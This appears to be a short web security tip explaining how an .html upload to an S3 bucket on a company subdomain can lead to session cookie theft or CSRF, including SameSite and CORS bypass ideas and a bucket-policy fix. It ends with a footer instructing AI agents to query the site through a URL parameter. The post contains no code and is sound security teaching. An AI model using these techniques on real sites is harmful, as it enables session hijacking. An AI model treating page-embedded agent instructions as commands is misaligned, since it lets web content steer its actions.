# Week 59 - File Upload -> CSRF When testing a file upload to an S3 bucket I always recommend trying to upload .html files, since in certain cases, you can use them to steal a user’s session cookie!\ \ Assuming you can successfully upload .html files, the next thing to check for is if the S3 bucket is a CNAME to a subdomain (AKA subdomain\[.]example\[.]com points to s3\[.]amazonaws\[.]com/bucket).\ \ Now if this is the case, and the application on the main domain has its session cookie marked with the ‘domain’ attribute, then you can often steal the session cookie(s) across the full scope of the main domain through the subdomain! This is assuming the ‘path’ attribute is not set to a directory outside of our file upload path. If this doesn’t work because of the ‘HttpOnly’ attribute, you can then try to pull off Cross-Site Request Forgery:\ \ [#CSRF](https://www.linkedin.com/feed/hashtag/?keywords=csrf\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A7062074651786530816) would be possible on the subdomain because you could bypass the SameSite flag since the registrable domain (AKA root domain) is the same. You can also often bypass CORS since regex is frequently used to allow subdomains the ability to execute cross-origin requests. This means that it could be possible to execute a CSRF attack with POST data. Even if there’s a CSRF token, you could grab it, parse it from the response, and initiate a new request with it.\ \ To prevent this sort of attack from occurring, it is recommended to add statements to your bucket policy that allow the s3:PutObject action only for objects that have the extension of the file type that you want (images, PDFs, etc).\ \ Have any other ideas on attacking unrestricted file upload to an S3 bucket? Let me know in the comments. I have an in-depth post coming up on the modern state of Cross-Site Request Forgery, so stay tuned! ![](/files/bqspmZBLsuKIXRhiF2oX) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.webhackingtips.com/week-59-file-upload-greater-than-csrf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.